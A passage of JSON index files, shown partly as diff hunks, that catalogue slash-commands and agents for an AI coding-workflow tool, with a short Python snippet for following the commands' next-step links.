"name": "brainstorm:artifacts",
"command": "/workflow:brainstorm:artifacts",
"description": "Interactive clarification with guidance specification",
"arguments": "\"topic\" [--count N]",
"category": "workflow",
"subcategory": "brainstorm",
"difficulty": "Intermediate",
"essential": true,
"source": "../../../commands/workflow/brainstorm/artifacts.md"
},
{
"name": "brainstorm:synthesis",
"command": "/workflow:brainstorm:synthesis",
"description": "Refine role analyses through Q&A",
"arguments": "[--session session-id]",
"category": "workflow",
"subcategory": "brainstorm",
"difficulty": "Advanced",
"source": "../../../commands/workflow/brainstorm/synthesis.md"
},
{
"name": "tdd-plan",
"command": "/workflow:tdd-plan",
"description": "TDD planning with Red-Green-Refactor cycles",
"arguments": "\"feature\"|file.md",
"category": "workflow",
"difficulty": "Advanced",
"flow": {
"next_steps": ["/workflow:execute", "/workflow:tdd-verify"],
"alternatives": ["/workflow:plan"]
},
"source": "../../../commands/workflow/tdd-plan.md"
},
{
"name": "tdd-verify",
"command": "/workflow:tdd-verify",
"description": "Verify TDD compliance with coverage analysis",
"arguments": "[session-id]",
"category": "workflow",
"difficulty": "Advanced",
"flow": {
"prerequisites": ["/workflow:execute"]
},
"source": "../../../commands/workflow/tdd-verify.md"
},
{
"name": "review",
"command": "/workflow:review",
"description": "Post-implementation review (security/architecture/quality)",
"arguments": "[--type=<type>] [session-id]",
"category": "workflow",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/review.md"
},
{
"name": "review-session-cycle",
"command": "/workflow:review-session-cycle",
"description": "Multi-dimensional code review across 7 dimensions",
"arguments": "[session-id] [--dimensions=...]",
"category": "workflow",
"difficulty": "Intermediate",
"essential": true,
"flow": {
"prerequisites": ["/workflow:execute"],
"next_steps": ["/workflow:review-fix"]
},
"source": "../../../commands/workflow/review-session-cycle.md"
},
{
"name": "review-module-cycle",
"command": "/workflow:review-module-cycle",
"description": "Module-based multi-dimensional review",
"arguments": "<path-pattern> [--dimensions=...]",
"category": "workflow",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/review-module-cycle.md"
},
{
"name": "review-fix",
"command": "/workflow:review-fix",
"description": "Automated fixing of review findings",
"arguments": "<export-file|review-dir>",
"category": "workflow",
"difficulty": "Intermediate",
"flow": {
"prerequisites": ["/workflow:review-session-cycle", "/workflow:review-module-cycle"]
},
"source": "../../../commands/workflow/review-fix.md"
},
{
"name": "test-gen",
"command": "/workflow:test-gen",
"description": "Generate test session from implementation",
"arguments": "source-session-id",
"category": "workflow",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/test-gen.md"
},
{
"name": "test-fix-gen",
"command": "/workflow:test-fix-gen",
"description": "Create test-fix session with strategy",
"arguments": "session-id|\"description\"|file",
"category": "workflow",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/test-fix-gen.md"
},
{
"name": "test-cycle-execute",
"command": "/workflow:test-cycle-execute",
"description": "Execute test-fix with iterative cycles",
"arguments": "[--resume-session=id] [--max-iterations=N]",
"category": "workflow",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/test-cycle-execute.md"
},
{
"name": "issue:new",
"command": "/issue:new",
"description": "Create issue from GitHub URL or text",
"arguments": "<url|text> [--priority 1-5]",
"category": "issue",
"difficulty": "Intermediate",
"source": "../../../commands/issue/new.md"
},
{
"name": "issue:discover",
"command": "/issue:discover",
"description": "Discover issues from multiple perspectives",
"arguments": "<path> [--perspectives=...]",
"category": "issue",
"difficulty": "Intermediate",
"source": "../../../commands/issue/discover.md"
},
{
"name": "issue:plan",
"command": "/issue:plan",
"description": "Batch plan issue resolution",
"arguments": "--all-pending|<ids>",
"category": "issue",
"difficulty": "Intermediate",
"flow": {
"next_steps": ["/issue:queue"]
},
"source": "../../../commands/issue/plan.md"
},
{
"name": "issue:queue",
"command": "/issue:queue",
"description": "Form execution queue from solutions",
"arguments": "[--rebuild]",
"category": "issue",
"difficulty": "Intermediate",
"flow": {
"prerequisites": ["/issue:plan"],
"next_steps": ["/issue:execute"]
},
"source": "../../../commands/issue/queue.md"
},
{
"name": "issue:execute",
"command": "/issue:execute",
"description": "Execute queue with DAG parallel",
"arguments": "[--worktree]",
"category": "issue",
"difficulty": "Intermediate",
"flow": {
"prerequisites": ["/issue:queue"]
},
"source": "../../../commands/issue/execute.md"
},
{
"name": "docs",
"command": "/memory:docs",
"description": "Plan documentation workflow",
"arguments": "[path] [--tool <tool>]",
"category": "memory",
"difficulty": "Intermediate",
"essential": true,
"flow": {
"next_steps": ["/workflow:execute"]
},
"source": "../../../commands/memory/docs.md"
},
{
"name": "update-related",
"command": "/memory:update-related",
"description": "Update docs for git-changed modules",
"arguments": "[--tool <tool>]",
"category": "memory",
"difficulty": "Intermediate",
"source": "../../../commands/memory/update-related.md"
},
{
"name": "update-full",
"command": "/memory:update-full",
"description": "Update all CLAUDE.md files",
"arguments": "[--tool <tool>]",
"category": "memory",
"difficulty": "Intermediate",
"source": "../../../commands/memory/update-full.md"
},
{
"name": "skill-memory",
"command": "/memory:skill-memory",
"description": "Generate SKILL.md with loading index",
"arguments": "[path] [--regenerate]",
"category": "memory",
"difficulty": "Intermediate",
"source": "../../../commands/memory/skill-memory.md"
},
{
"name": "load-skill-memory",
"command": "/memory:load-skill-memory",
"description": "Activate SKILL package for task",
"arguments": "[skill_name] \"task intent\"",
"category": "memory",
"difficulty": "Intermediate",
"source": "../../../commands/memory/load-skill-memory.md"
},
{
"name": "load",
"command": "/memory:load",
"description": "Load project context via CLI",
"arguments": "[--tool <tool>] \"context\"",
"category": "memory",
"difficulty": "Intermediate",
"source": "../../../commands/memory/load.md"
},
{
"name": "compact",
"command": "/memory:compact",
"description": "Compact session memory for recovery",
"arguments": "[description]",
"category": "memory",
"difficulty": "Intermediate",
"source": "../../../commands/memory/compact.md"
},
{
"name": "task:create",
"command": "/task:create",
"description": "Generate task JSON from description",
"arguments": "\"task title\"",
"category": "task",
"difficulty": "Intermediate",
"source": "../../../commands/task/create.md"
},
{
"name": "task:execute",
"command": "/task:execute",
"description": "Execute task JSON with agent",
"arguments": "task-id",
"category": "task",
"difficulty": "Intermediate",
"source": "../../../commands/task/execute.md"
},
{
"name": "task:breakdown",
"command": "/task:breakdown",
"description": "Decompose task into subtasks",
"arguments": "task-id",
"category": "task",
"difficulty": "Intermediate",
"source": "../../../commands/task/breakdown.md"
},
{
"name": "task:replan",
"command": "/task:replan",
"description": "Update task with new requirements",
"arguments": "task-id [\"text\"|file]",
"category": "task",
"difficulty": "Intermediate",
"source": "../../../commands/task/replan.md"
},
{
"name": "version",
"command": "/version",
"description": "Display version and check updates",
"arguments": "",
"category": "general",
"difficulty": "Beginner",
"essential": true,
"source": "../../../commands/version.md"
},
{
"name": "enhance-prompt",
"command": "/enhance-prompt",
"description": "Transform prompts with session memory",
"arguments": "user input",
"category": "general",
"difficulty": "Intermediate",
"source": "../../../commands/enhance-prompt.md"
}
],
"agents": [
{ "name": "action-planning-agent", "description": "Task planning and generation", "source": "../../../agents/action-planning-agent.md" },
{ "name": "cli-execution-agent", "description": "CLI tool execution", "source": "../../../agents/cli-execution-agent.md" },
{ "name": "cli-explore-agent", "description": "Codebase exploration", "source": "../../../agents/cli-explore-agent.md" },
{ "name": "cli-lite-planning-agent", "description": "Lightweight planning", "source": "../../../agents/cli-lite-planning-agent.md" },
{ "name": "cli-planning-agent", "description": "CLI-based planning", "source": "../../../agents/cli-planning-agent.md" },
{ "name": "code-developer", "description": "Code implementation", "source": "../../../agents/code-developer.md" },
{ "name": "conceptual-planning-agent", "description": "Conceptual analysis", "source": "../../../agents/conceptual-planning-agent.md" },
{ "name": "context-search-agent", "description": "Context discovery", "source": "../../../agents/context-search-agent.md" },
{ "name": "doc-generator", "description": "Documentation generation", "source": "../../../agents/doc-generator.md" },
{ "name": "issue-plan-agent", "description": "Issue planning", "source": "../../../agents/issue-plan-agent.md" },
{ "name": "issue-queue-agent", "description": "Issue queue formation", "source": "../../../agents/issue-queue-agent.md" },
{ "name": "memory-bridge", "description": "Documentation coordination", "source": "../../../agents/memory-bridge.md" },
{ "name": "test-context-search-agent", "description": "Test context collection", "source": "../../../agents/test-context-search-agent.md" },
{ "name": "test-fix-agent", "description": "Test execution and fixing", "source": "../../../agents/test-fix-agent.md" },
{ "name": "ui-design-agent", "description": "UI design and prototyping", "source": "../../../agents/ui-design-agent.md" },
{ "name": "universal-executor", "description": "Universal task execution", "source": "../../../agents/universal-executor.md" }
],
"categories": ["workflow", "issue", "memory", "task", "general", "cli"]
}
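A consumer of this index can key commands by their `command` string and walk the `flow` links to suggest next steps. A minimal sketch over an inline slice of the schema above:

```python
# Inline slice of the unified index (shape taken from command.json above).
index = {
    "commands": [
        {
            "command": "/workflow:plan",
            "description": "5-phase planning with task JSON generation",
            "flow": {"next_steps": ["/workflow:action-plan-verify", "/workflow:execute"]},
        },
        {
            "command": "/workflow:execute",
            "description": "Coordinate agent execution with DAG parallel processing",
            "flow": {"prerequisites": ["/workflow:plan"], "next_steps": ["/workflow:review"]},
        },
    ]
}

# Build a lookup table keyed by the slash-command string.
by_command = {c["command"]: c for c in index["commands"]}

def next_steps(cmd: str) -> list:
    """Follow flow.next_steps links; empty list when a command has no flow."""
    return by_command[cmd].get("flow", {}).get("next_steps", [])

print(next_steps("/workflow:plan"))  # → ['/workflow:action-plan-verify', '/workflow:execute']
```

Because `flow` is optional on many entries, the double `.get(...)` keeps the lookup total rather than raising on commands without a declared flow.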


@@ -1,82 +0,0 @@
[
{
"name": "action-planning-agent",
"description": "|",
"source": "../../../agents/action-planning-agent.md"
},
{
"name": "cli-execution-agent",
"description": "|",
"source": "../../../agents/cli-execution-agent.md"
},
{
"name": "cli-explore-agent",
"description": "|",
"source": "../../../agents/cli-explore-agent.md"
},
{
"name": "cli-lite-planning-agent",
"description": "|",
"source": "../../../agents/cli-lite-planning-agent.md"
},
{
"name": "cli-planning-agent",
"description": "|",
"source": "../../../agents/cli-planning-agent.md"
},
{
"name": "code-developer",
"description": "|",
"source": "../../../agents/code-developer.md"
},
{
"name": "conceptual-planning-agent",
"description": "|",
"source": "../../../agents/conceptual-planning-agent.md"
},
{
"name": "context-search-agent",
"description": "|",
"source": "../../../agents/context-search-agent.md"
},
{
"name": "doc-generator",
"description": "|",
"source": "../../../agents/doc-generator.md"
},
{
"name": "issue-plan-agent",
"description": "|",
"source": "../../../agents/issue-plan-agent.md"
},
{
"name": "issue-queue-agent",
"description": "|",
"source": "../../../agents/issue-queue-agent.md"
},
{
"name": "memory-bridge",
"description": "Execute complex project documentation updates using script coordination",
"source": "../../../agents/memory-bridge.md"
},
{
"name": "test-context-search-agent",
"description": "|",
"source": "../../../agents/test-context-search-agent.md"
},
{
"name": "test-fix-agent",
"description": "|",
"source": "../../../agents/test-fix-agent.md"
},
{
"name": "ui-design-agent",
"description": "|",
"source": "../../../agents/ui-design-agent.md"
},
{
"name": "universal-executor",
"description": "|",
"source": "../../../agents/universal-executor.md"
}
]


@@ -1,882 +0,0 @@
[
{
"name": "cli-init",
"command": "/cli:cli-init",
"description": "Generate .gemini/ and .qwen/ config directories with settings.json and ignore files based on workspace technology detection",
"arguments": "[--tool gemini|qwen|all] [--output path] [--preview]",
"category": "cli",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/cli/cli-init.md"
},
{
"name": "enhance-prompt",
"command": "/enhance-prompt",
"description": "Enhanced prompt transformation using session memory and intent analysis with --enhance flag detection",
"arguments": "user input to enhance",
"category": "general",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/enhance-prompt.md"
},
{
"name": "issue:discover",
"command": "/issue:discover",
"description": "Discover potential issues from multiple perspectives (bug, UX, test, quality, security, performance, maintainability, best-practices) using CLI explore. Supports Exa external research for security and best-practices perspectives.",
"arguments": "<path-pattern> [--perspectives=bug,ux,...] [--external]",
"category": "issue",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/issue/discover.md"
},
{
"name": "execute",
"command": "/issue:execute",
"description": "Execute queue with codex using DAG-based parallel orchestration (solution-level)",
"arguments": "[--worktree] [--queue <queue-id>]",
"category": "issue",
"subcategory": null,
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/issue/execute.md"
},
{
"name": "new",
"command": "/issue:new",
"description": "Create structured issue from GitHub URL or text description",
"arguments": "<github-url | text-description> [--priority 1-5]",
"category": "issue",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/issue/new.md"
},
{
"name": "plan",
"command": "/issue:plan",
"description": "Batch plan issue resolution using issue-plan-agent (explore + plan closed-loop)",
    "arguments": "--all-pending | <issue-id>[,<issue-id>,...] [--batch-size 3]",
"category": "issue",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/issue/plan.md"
},
{
"name": "queue",
"command": "/issue:queue",
"description": "Form execution queue from bound solutions using issue-queue-agent (solution-level)",
"arguments": "[--rebuild] [--issue <id>]",
"category": "issue",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/issue/queue.md"
},
{
"name": "code-map-memory",
"command": "/memory:code-map-memory",
"description": "3-phase orchestrator: parse feature keyword → cli-explore-agent analyzes (Deep Scan dual-source) → orchestrator generates Mermaid docs + SKILL package (skips phase 2 if exists)",
    "arguments": "\"feature-keyword\" [--regenerate] [--tool <gemini|qwen>]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/code-map-memory.md"
},
{
"name": "compact",
"command": "/memory:compact",
"description": "Compact current session memory into structured text for session recovery, extracting objective/plan/files/decisions/constraints/state, and save via MCP core_memory tool",
"arguments": "[optional: session description]",
"category": "memory",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/memory/compact.md"
},
{
"name": "docs-full-cli",
"command": "/memory:docs-full-cli",
"description": "Generate full project documentation using CLI execution (Layer 3→1) with batched agents (4 modules/agent) and gemini→qwen→codex fallback, <20 modules uses direct parallel",
"arguments": "[path] [--tool <gemini|qwen|codex>]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/docs-full-cli.md"
},
{
"name": "docs-related-cli",
"command": "/memory:docs-related-cli",
"description": "Generate/update documentation for git-changed modules using CLI execution with batched agents (4 modules/agent) and gemini→qwen→codex fallback, <15 modules uses direct parallel",
"arguments": "[--tool <gemini|qwen|codex>]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/docs-related-cli.md"
},
{
"name": "docs",
"command": "/memory:docs",
"description": "Plan documentation workflow with dynamic grouping (≤10 docs/task), generates IMPL tasks for parallel module trees, README, ARCHITECTURE, and HTTP API docs",
"arguments": "[path] [--tool <gemini|qwen|codex>] [--mode <full|partial>] [--cli-execute]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/docs.md"
},
{
"name": "load-skill-memory",
"command": "/memory:load-skill-memory",
"description": "Activate SKILL package (auto-detect from paths/keywords or manual) and intelligently load documentation based on task intent keywords",
    "arguments": "[skill_name] \"task intent description\"",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/load-skill-memory.md"
},
{
"name": "load",
"command": "/memory:load",
"description": "Delegate to universal-executor agent to analyze project via Gemini/Qwen CLI and return JSON core content package for task context",
    "arguments": "[--tool gemini|qwen] \"task context description\"",
"category": "memory",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/memory/load.md"
},
{
"name": "skill-memory",
"command": "/memory:skill-memory",
"description": "4-phase autonomous orchestrator: check docs → /memory:docs planning → /workflow:execute → generate SKILL.md with progressive loading index (skips phases 2-3 if docs exist)",
"arguments": "[path] [--tool <gemini|qwen|codex>] [--regenerate] [--mode <full|partial>] [--cli-execute]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/skill-memory.md"
},
{
"name": "style-skill-memory",
"command": "/memory:style-skill-memory",
"description": "Generate SKILL memory package from style reference for easy loading and consistent design system usage",
"arguments": "[package-name] [--regenerate]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/style-skill-memory.md"
},
{
"name": "swagger-docs",
"command": "/memory:swagger-docs",
"description": "Generate complete Swagger/OpenAPI documentation following RESTful standards with global security, API details, error codes, and validation tests",
"arguments": "[path] [--tool <gemini|qwen|codex>] [--format <yaml|json>] [--version <v3.0|v3.1>] [--lang <zh|en>]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/swagger-docs.md"
},
{
"name": "tech-research-rules",
"command": "/memory:tech-research-rules",
"description": "3-phase orchestrator: extract tech stack → Exa research → generate path-conditional rules (auto-loaded by Claude Code)",
"arguments": "[session-id | tech-stack-name] [--regenerate] [--tool <gemini|qwen>]",
"category": "memory",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/memory/tech-research-rules.md"
},
{
"name": "update-full",
"command": "/memory:update-full",
"description": "Update all CLAUDE.md files using layer-based execution (Layer 3→1) with batched agents (4 modules/agent) and gemini→qwen→codex fallback, <20 modules uses direct parallel",
"arguments": "[--tool gemini|qwen|codex] [--path <directory>]",
"category": "memory",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/memory/update-full.md"
},
{
"name": "update-related",
"command": "/memory:update-related",
"description": "Update CLAUDE.md for git-changed modules using batched agent execution (4 modules/agent) with gemini→qwen→codex fallback, <15 modules uses direct execution",
"arguments": "[--tool gemini|qwen|codex]",
"category": "memory",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/memory/update-related.md"
},
{
"name": "workflow-skill-memory",
"command": "/memory:workflow-skill-memory",
"description": "Process WFS-* archived sessions using universal-executor agents with Gemini analysis to generate workflow-progress SKILL package (sessions-timeline, lessons, conflicts)",
"arguments": "session <session-id> | all",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/workflow-skill-memory.md"
},
{
"name": "breakdown",
"command": "/task:breakdown",
"description": "Decompose complex task into subtasks with dependency mapping, creates child task JSONs with parent references and execution order",
"arguments": "task-id",
"category": "task",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/task/breakdown.md"
},
{
"name": "create",
"command": "/task:create",
"description": "Generate task JSON from natural language description with automatic file pattern detection, scope inference, and dependency analysis",
    "arguments": "\"task title\"",
"category": "task",
"subcategory": null,
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/task/create.md"
},
{
"name": "execute",
"command": "/task:execute",
"description": "Execute task JSON using appropriate agent (@doc-generator/@implementation-agent/@test-agent) with pre-analysis context loading and status tracking",
"arguments": "task-id",
"category": "task",
"subcategory": null,
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/task/execute.md"
},
{
"name": "replan",
"command": "/task:replan",
"description": "Update task JSON with new requirements or batch-update multiple tasks from verification report, tracks changes in task-changes.json",
    "arguments": "task-id [\"text\"|file.md] | --batch [verification-report.md]",
"category": "task",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/task/replan.md"
},
{
"name": "version",
"command": "/version",
"description": "Display Claude Code version information and check for updates",
"arguments": "",
"category": "general",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Beginner",
"source": "../../../commands/version.md"
},
{
"name": "action-plan-verify",
"command": "/workflow:action-plan-verify",
"description": "Perform non-destructive cross-artifact consistency analysis between IMPL_PLAN.md and task JSONs with quality gate validation",
"arguments": "[optional: --session session-id]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/action-plan-verify.md"
},
{
"name": "api-designer",
"command": "/workflow:brainstorm:api-designer",
"description": "Generate or update api-designer/analysis.md addressing guidance-specification discussion points for API design perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/api-designer.md"
},
{
"name": "artifacts",
"command": "/workflow:brainstorm:artifacts",
"description": "Interactive clarification generating confirmed guidance specification through role-based analysis and synthesis",
"arguments": "topic or challenge description [--count N]",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/artifacts.md"
},
{
"name": "auto-parallel",
"command": "/workflow:brainstorm:auto-parallel",
"description": "Parallel brainstorming automation with dynamic role selection and concurrent execution across multiple perspectives",
    "arguments": "\"topic or challenge description\" [--count N]",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Advanced",
"source": "../../../commands/workflow/brainstorm/auto-parallel.md"
},
{
"name": "data-architect",
"command": "/workflow:brainstorm:data-architect",
"description": "Generate or update data-architect/analysis.md addressing guidance-specification discussion points for data architecture perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/data-architect.md"
},
{
"name": "product-manager",
"command": "/workflow:brainstorm:product-manager",
"description": "Generate or update product-manager/analysis.md addressing guidance-specification discussion points for product management perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/product-manager.md"
},
{
"name": "product-owner",
"command": "/workflow:brainstorm:product-owner",
"description": "Generate or update product-owner/analysis.md addressing guidance-specification discussion points for product ownership perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/product-owner.md"
},
{
"name": "scrum-master",
"command": "/workflow:brainstorm:scrum-master",
"description": "Generate or update scrum-master/analysis.md addressing guidance-specification discussion points for Agile process perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/scrum-master.md"
},
{
"name": "subject-matter-expert",
"command": "/workflow:brainstorm:subject-matter-expert",
"description": "Generate or update subject-matter-expert/analysis.md addressing guidance-specification discussion points for domain expertise perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/subject-matter-expert.md"
},
{
"name": "synthesis",
"command": "/workflow:brainstorm:synthesis",
"description": "Clarify and refine role analyses through intelligent Q&A and targeted updates with synthesis agent",
"arguments": "[optional: --session session-id]",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Advanced",
"source": "../../../commands/workflow/brainstorm/synthesis.md"
},
{
"name": "system-architect",
"command": "/workflow:brainstorm:system-architect",
"description": "Generate or update system-architect/analysis.md addressing guidance-specification discussion points for system architecture perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/system-architect.md"
},
{
"name": "ui-designer",
"command": "/workflow:brainstorm:ui-designer",
"description": "Generate or update ui-designer/analysis.md addressing guidance-specification discussion points for UI design perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/ui-designer.md"
},
{
"name": "ux-expert",
"command": "/workflow:brainstorm:ux-expert",
"description": "Generate or update ux-expert/analysis.md addressing guidance-specification discussion points for UX perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/ux-expert.md"
},
{
"name": "clean",
"command": "/workflow:clean",
"description": "Intelligent code cleanup with mainline detection, stale artifact discovery, and safe execution",
"arguments": "[--dry-run] [\\\"focus area\\\"]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/clean.md"
},
{
"name": "debug",
"command": "/workflow:debug",
"description": "Interactive hypothesis-driven debugging with NDJSON logging, iterative until resolved",
"arguments": "\\\"bug description or error message\\\"",
"category": "workflow",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/debug.md"
},
{
"name": "execute",
"command": "/workflow:execute",
"description": "Coordinate agent execution for workflow tasks with automatic session discovery, parallel task processing, and status tracking",
"arguments": "[--resume-session=\\\"session-id\\\"]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/execute.md"
},
{
"name": "init",
"command": "/workflow:init",
"description": "Initialize project-level state with intelligent project analysis using cli-explore-agent",
"arguments": "[--regenerate]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/init.md"
},
{
"name": "lite-execute",
"command": "/workflow:lite-execute",
"description": "Execute tasks based on in-memory plan, prompt description, or file content",
"arguments": "[--in-memory] [\\\"task description\\\"|file-path]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/lite-execute.md"
},
{
"name": "lite-fix",
"command": "/workflow:lite-fix",
"description": "Lightweight bug diagnosis and fix workflow with intelligent severity assessment and optional hotfix mode for production incidents",
"arguments": "[--hotfix] \\\"bug description or issue reference\\\"",
"category": "workflow",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/lite-fix.md"
},
{
"name": "lite-plan",
"command": "/workflow:lite-plan",
"description": "Lightweight interactive planning workflow with in-memory planning, code exploration, and execution dispatch to lite-execute after user confirmation",
"arguments": "[-e|--explore] \\\"task description\\\"|file.md",
"category": "workflow",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/lite-plan.md"
},
{
"name": "plan",
"command": "/workflow:plan",
"description": "5-phase planning workflow with action-planning-agent task generation, outputs IMPL_PLAN.md and task JSONs",
"arguments": "\\\"text description\\\"|file.md",
"category": "workflow",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/plan.md"
},
{
"name": "replan",
"command": "/workflow:replan",
"description": "Interactive workflow replanning with session-level artifact updates and boundary clarification through guided questioning",
"arguments": "[--session session-id] [task-id] \\\"requirements\\\"|file.md [--interactive]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/replan.md"
},
{
"name": "review-fix",
"command": "/workflow:review-fix",
"description": "Automated fixing of code review findings with AI-powered planning and coordinated execution. Uses intelligent grouping, multi-stage timeline coordination, and test-driven verification.",
"arguments": "<export-file|review-dir> [--resume] [--max-iterations=N]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "analysis",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/review-fix.md"
},
{
"name": "review-module-cycle",
"command": "/workflow:review-module-cycle",
"description": "Independent multi-dimensional code review for specified modules/files. Analyzes specific code paths across 7 dimensions with hybrid parallel-iterative execution, independent of workflow sessions.",
"arguments": "<path-pattern> [--dimensions=security,architecture,...] [--max-iterations=N]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "analysis",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/review-module-cycle.md"
},
{
"name": "review-session-cycle",
"command": "/workflow:review-session-cycle",
"description": "Session-based comprehensive multi-dimensional code review. Analyzes git changes from workflow session across 7 dimensions with hybrid parallel-iterative execution, aggregates findings, and performs focused deep-dives on critical issues until quality gates met.",
"arguments": "[session-id] [--dimensions=security,architecture,...] [--max-iterations=N]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "session-management",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/review-session-cycle.md"
},
{
"name": "review",
"command": "/workflow:review",
"description": "Post-implementation review with specialized types (security/architecture/action-items/quality) using analysis agents and Gemini",
"arguments": "[--type=security|architecture|action-items|quality] [--archived] [optional: session-id]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "analysis",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/review.md"
},
{
"name": "complete",
"command": "/workflow:session:complete",
"description": "Mark active workflow session as complete, archive with lessons learned, update manifest, remove active flag",
"arguments": "",
"category": "workflow",
"subcategory": "session",
"usage_scenario": "session-management",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/session/complete.md"
},
{
"name": "list",
"command": "/workflow:session:list",
"description": "List all workflow sessions with status filtering, shows session metadata and progress information",
"arguments": "",
"category": "workflow",
"subcategory": "session",
"usage_scenario": "general",
"difficulty": "Beginner",
"source": "../../../commands/workflow/session/list.md"
},
{
"name": "resume",
"command": "/workflow:session:resume",
"description": "Resume the most recently paused workflow session with automatic session discovery and status update",
"arguments": "",
"category": "workflow",
"subcategory": "session",
"usage_scenario": "session-management",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/session/resume.md"
},
{
"name": "solidify",
"command": "/workflow:session:solidify",
"description": "Crystallize session learnings and user-defined constraints into permanent project guidelines",
